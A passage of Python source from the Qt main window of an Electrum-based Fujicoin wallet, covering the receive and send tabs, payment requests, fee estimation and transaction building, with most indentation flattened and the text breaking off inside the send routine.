is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if is_relevant:
self.notify(_("New transaction received: {}").format(self.format_amount_and_units(v)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
        text = self.format_amount(amount) + ' ' + self.base_unit()
        x = self.fx.format_amount_and_units(amount) if self.fx else None
        if text and x:
            text += ' (%s)' % x
return text
def format_fee_rate(self, fee_rate):
return format_fee_satoshis(fee_rate/1000, num_zeros=self.num_zeros) + ' sat/byte'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
return decimal_point_to_base_unit_name(self.decimal_point)
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
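    # Worked example for the conversion above (values hypothetical): with
    # rate = 10000 fiat units per BTC and a fiat amount of 25.00,
    # btc_e.setAmount(int(Decimal('25.00') / Decimal(10000) * COIN))
    # stores 250000 satoshis (0.0025 BTC) when COIN == 100000000.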
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
text = _("Synchronizing...")
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
        self.status_button.setIcon(icon)
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_history', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('Fujicoin address where the payment should be received. Note that each payment request uses a different Fujicoin address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Fujicoin addresses.'),
_('The fujicoin address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
URI = util.create_URI(addr, amount, message)
if req.get('time'):
URI += "&time=%d"%req.get('time')
if req.get('exp'):
URI += "&exp=%d"%req.get('exp')
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
URI += "&name=" + req['name'] + "&sig="+sig
return str(URI)
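    # Illustrative result (all values hypothetical): for a signed request this
    # yields a BIP21-style URI such as
    # 'fujicoin:F...?amount=0.001&message=invoice&time=1546300800&exp=3600&name=alias&sig=<base58>'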
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req, self.config)
except Exception as e:
traceback.print_exc(file=sys.stderr)
self.show_error(_('Error adding payment request') + ':\n' + str(e))
else:
self.sign_payment_request(addr)
self.save_request_button.setEnabled(False)
finally:
self.request_list.update()
self.address_list.update()
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
try:
addr = self.wallet.get_receiving_address() or ''
except InternalAddressCorruption as e:
self.show_error(str(e))
addr = ''
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_URI(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def set_feerounding_text(self, num_satoshis_added):
self.feerounding_text = (_('Additional {} satoshis are going to be added.')
.format(num_satoshis_added))
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Fujicoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Fujicoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = FromList(self, self.from_list_menu)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 4, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(140)
grid.addWidget(self.max_button, 4, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 4, 4)
msg = _('Fujicoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
def fee_cb(dyn, pos, fee_rate):
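# Slider callback: persist either the dynamic-estimate level (mempool depth or
# ETA position) or a static sat/kB rate, then mirror the rate into the feerate
# field as sat/byte.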
if dyn:
if self.config.use_mempool_fees():
self.config.set_key('depth_level', pos, False)
else:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
if fee_rate:
fee_rate = Decimal(fee_rate)
self.feerate_e.setAmount(quantize_feerate(fee_rate / 1000))
else:
self.feerate_e.setAmount(None)
self.fee_e.setModified(False)
self.fee_slider.activate()
self.spend_max() if self.is_max else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(140)
def on_fee_or_feerate(edit_changed, editing_finished):
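# The fee and feerate fields are mutually exclusive: whichever was edited last
# stays "modified" and drives the fee; the other one is un-frozen.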
edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
if editing_finished:
if edit_changed.get_amount() is None:
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
edit_changed.setModified(False)
else:
# edit_changed was edited just now, so make sure we will
# freeze the correct fee setting (this)
edit_other.setModified(False)
self.fee_slider.deactivate()
self.update_fee()
class TxSizeLabel(QLabel):
def setAmount(self, byte_size):
self.setText(('x %s bytes =' % byte_size) if byte_size else '')
self.size_e = TxSizeLabel()
self.size_e.setAlignment(Qt.AlignCenter)
self.size_e.setAmount(0)
self.size_e.setFixedWidth(140)
self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
self.feerate_e = FeerateEdit(lambda: 0)
self.feerate_e.setAmount(self.config.fee_per_byte())
self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
def feerounding_onclick():
text = (self.feerounding_text + '\n\n' +
_('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' +
_('At most 100 satoshis might be lost due to this rounding.') + ' ' +
_("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
_('Also, dust is not kept as change, but added to the fee.') + '\n' +
_('Also, when batching RBF transactions, BIP 125 imposes a lower bound on the fee.'))
QMessageBox.information(self, 'Fee rounding', text)
self.feerounding_icon = QPushButton(read_QIcon('info.png'), '')
self.feerounding_icon.setFixedWidth(20)
self.feerounding_icon.setFlat(True)
self.feerounding_icon.clicked.connect(feerounding_onclick)
self.feerounding_icon.setVisible(False)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
vbox_feelabel = QVBoxLayout()
vbox_feelabel.addWidget(self.fee_e_label)
vbox_feelabel.addStretch(1)
grid.addLayout(vbox_feelabel, 5, 0)
self.fee_adv_controls = QWidget()
hbox = QHBoxLayout(self.fee_adv_controls)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.feerate_e)
hbox.addWidget(self.size_e)
hbox.addWidget(self.fee_e)
hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
hbox.addStretch(1)
vbox_feecontrol = QVBoxLayout()
vbox_feecontrol.addWidget(self.fee_adv_controls)
vbox_feecontrol.addWidget(self.fee_slider)
grid.addLayout(vbox_feecontrol, 5, 1, 1, -1)
if not self.config.get('show_fee', False):
self.fee_adv_controls.setVisible(False)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(text):
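# Any manual edit cancels "max" mode; the Max button is only re-enabled while
# the amount field is empty and editable.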
self.is_max = False
enable = not bool(text) and not self.amount_e.isReadOnly()
self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
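# Recolor the amount/fee/feerate fields: red when funds are insufficient,
# blue for values that were auto-filled rather than typed by the user.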
text = ""
amt_color = ColorScheme.DEFAULT
fee_color = ColorScheme.DEFAULT
feerate_color = ColorScheme.DEFAULT
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
feerate_color = ColorScheme.RED
text = _( "Not enough funds" )
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += ' (' + self.format_amount(c+u+x).strip() + ' ' + self.base_unit() + ' ' +_("are frozen") + ')'
# blue color denotes auto-filled values
elif self.fee_e.isModified():
feerate_color = ColorScheme.BLUE
elif self.feerate_e.isModified():
fee_color = ColorScheme.BLUE
elif self.amount_e.isModified():
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
else:
amt_color = ColorScheme.BLUE
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.feerate_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
self.is_max = True
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
freeze_fee = self.is_send_fee_frozen()
freeze_feerate = self.is_send_feerate_frozen()
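# '!' is the sentinel amount meaning "spend all available coins"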
amount = '!' if self.is_max else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
else:
fee_estimator = self.get_send_fee_estimator()
outputs = self.payto_e.get_outputs(self.is_max)
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [TxOutput(_type, addr, amount)]
is_sweep = bool(self.tx_external_keypairs)
make_tx = lambda fee_est: \
self.wallet.make_unsigned_transaction(
self.get_coins(), outputs, self.config,
fixed_fee=fee_est, is_sweep=is_sweep)
try:
tx = make_tx(fee_estimator)
self.not_enough_funds = False
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
if not freeze_fee:
self.fee_e.setAmount(None)
if not freeze_feerate:
self.feerate_e.setAmount(None)
self.feerounding_icon.setVisible(False)
if isinstance(e, NotEnoughFunds):
self.not_enough_funds = True
elif isinstance(e, NoDynamicFeeEstimates):
try:
tx = make_tx(0)
size = tx.estimated_size()
self.size_e.setAmount(size)
except BaseException:
pass
return
except BaseException:
traceback.print_exc(file=sys.stderr)
return
size = tx.estimated_size()
self.size_e.setAmount(size)
fee = tx.get_fee()
fee = None if self.not_enough_funds else fee
# Displayed fee/fee_rate values are set according to user input.
# Due to rounding or dropping dust in CoinChooser,
# actual fees often differ somewhat.
if freeze_feerate or self.fee_slider.is_active():
displayed_feerate = self.feerate_e.get_amount()
if displayed_feerate is not None:
displayed_feerate = quantize_feerate(displayed_feerate)
else:
# fallback to actual fee
displayed_feerate = quantize_feerate(fee / size) if fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
displayed_fee = round(displayed_feerate * size) if displayed_feerate is not None else None
self.fee_e.setAmount(displayed_fee)
else:
if freeze_fee:
displayed_fee = self.fee_e.get_amount()
else:
# fallback to actual fee if nothing is frozen
displayed_fee = fee
self.fee_e.setAmount(displayed_fee)
displayed_fee = displayed_fee if displayed_fee else 0
displayed_feerate = quantize_feerate(displayed_fee / size) if displayed_fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
# show/hide fee rounding icon
feerounding = (fee - displayed_fee) if fee else 0
self.set_feerounding_text(int(feerounding))
self.feerounding_icon.setToolTip(self.feerounding_text)
self.feerounding_icon.setVisible(abs(feerounding) >= 1)
if self.is_max:
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return '{}...{}:{}\t{}'.format(h[0:10], h[-10:], x.get('prevout_n'), x.get('address'))
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def is_send_fee_frozen(self):
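# A fee (or feerate) counts as frozen when the user typed it manually;
# the auto-recalculation in do_update_fee must then leave it alone.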
return self.fee_e.isVisible() and self.fee_e.isModified() \
and (self.fee_e.text() or self.fee_e.hasFocus())
def is_send_feerate_frozen(self):
return self.feerate_e.isVisible() and self.feerate_e.isModified() \
and (self.feerate_e.text() or self.feerate_e.hasFocus())
def get_send_fee_estimator(self):
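# Returns an absolute fee in satoshis, a callable estimator built from the
# frozen sat/byte rate, or None to fall back to the config's estimator.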
if self.is_send_fee_frozen():
fee_estimator = self.fee_e.get_amount()
elif self.is_send_feerate_frozen():
amount = self.feerate_e.get_amount() # sat/byte feerate
amount = 0 if amount is None else amount * 1000 # sat/kilobyte feerate
fee_estimator = partial(
simple_config.SimpleConfig.estimate_fee_for_feerate, amount)
else:
fee_estimator = None
return fee_estimator
def read_send_tab(self):
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = self.message_e.text()
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return
outputs = self.payto_e.get_outputs(self.is_max)
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return
if not outputs:
self.show_error(_('No outputs'))
return
for o in outputs:
if o.address is None:
self.show_error(_('Fujicoin Address is None'))
return
if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address):
self.show_error(_('Invalid Fujicoin Address'))
return
if o.value is None:
self.show_error(_('Invalid Amount'))
return
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
return outputs, fee_estimator, label, coins
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
r = self.read_send_tab()
if not r:
return
outputs, fee_estimator, tx_desc, coins = r
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(
coins, outputs, self.config, fixed_fee=fee_estimator,
is_sweep=is_sweep)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
self.show_message(str(e))
return
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
amount = tx.output_value() if self.is_max else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
use_rbf = self.config.get('use_rbf', True)
if use_rbf:
tx.set_rbf(True)
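# relayfee() is in sat/kB, so scale by the estimated tx size to get the
# minimum absolute fee the server will relay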
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error('\n'.join([
_("This transaction requires a higher fee, or it will not be propagated by your current server"),
_("Try to raise your transaction fee, or use a server with a lower relay fee.")
]))
return
if preview:
self.show_transaction(tx, tx_desc)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
